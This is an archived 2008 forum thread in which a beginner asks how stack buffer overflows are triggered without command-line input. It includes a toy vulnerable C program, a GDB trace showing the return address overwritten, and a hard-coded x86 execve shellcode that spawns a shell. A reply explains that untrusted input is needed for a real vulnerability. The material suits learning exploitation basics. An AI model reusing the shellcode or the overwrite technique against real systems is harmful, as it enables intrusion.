Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 11:59

View unanswered posts | View active topics


Board index » aluigi.org » Advisories

All times are UTC [ DST ]




Forum locked This topic is locked, you cannot edit posts or make further replies.  Page 1 of 1
  [ 5 posts ] 
  Print view Previous topic | Next topic 
Author Message
nels
 Post subject: how to find a vulnerability in a program
PostPosted: 17 Aug 2008 07:55 

Joined: 17 Aug 2008 07:18
Posts: 3
hello and regrettable for my bad English, I am french, I will explain my problem example:

I download a program and I found a vulnerability in the source code, I know of cases of school, based oveflow stack, heap based overflow etc. ..

but I know the exploited only by the intermediary of argv, but if the program does not argument, and not to enter direct to fill the buffer, how do I do? strcpy if a place is in the midst of the programme and is not completed by argv [n] ... How to fill the buffer to see if the program crash?
I'm on debian etch, ubuntu 8.04, and window XP SP3.
Top
 Profile  
 
 
aluigi
 Post subject:
PostPosted: 17 Aug 2008 10:53 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
if you have something like strcpy(buffer, argv[1]) means that the command-line arguments of the program are read for sure.
in this case, if the strcpy is in main(), the buffer-overflow shouldn't have a real effect since there is no return address to overwrite.
Top
 Profile  
 
nels
 Post subject:
PostPosted: 17 Aug 2008 11:38 

Joined: 17 Aug 2008 07:18
Posts: 3
ok thank you, but consider this example:

Code:
void copier(char *chaine)
{
   char buffer[30];
   strcpy(buffer, chaine);   
   printf("%s", buffer);
}
int main()
{
   char buf[512];
   copier(buf);
return 0;
}

with GDB i do:
Code:
Breakpoint 1, main () at vuln.c:15
15      copier(buf);
(gdb) set buf="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXX"
(gdb) n

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) p $eip
$1 = (void (*)()) 0x58585858
(gdb)


the overflow overwrites well the return address.
and now even with a shellcode instead of a buffer:

Code:
void copier(char *chaine)
{
   char buffer[30];
   strcpy(buffer, chaine);   
   printf("%s", buffer);
}
int main()
{
   char buf[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80\x3f\xf5\xff\xbf";
   copier(buf);
return 0;
}


I start with GDB :

Code:
(gdb) r
Starting program: /home/nels/prog_C/vuln
Executing new program: /bin/dash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
$


without GDB how I can write in the buffer?
Top
 Profile  
 
aluigi
 Post subject:
PostPosted: 17 Aug 2008 12:23 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
naturally you can't.
without the input from the attacker (file, network, command-line argument, environment variable and so on) there is no vulnerability.

in your case there is no bug at all because buf is not filled with data, it's just uninitialized
Top
 Profile  
 
nels
 Post subject:
PostPosted: 17 Aug 2008 12:55 

Joined: 17 Aug 2008 07:18
Posts: 3
ok, I try from 2 days to write in the buffer without GDB ... thank you very much for all these details.

PS: your small tool, "morsegen" is too fun.well found.
Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  Page 1 of 1
  [ 5 posts ] 

Board index » aluigi.org » Advisories

All times are UTC [ DST ]

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: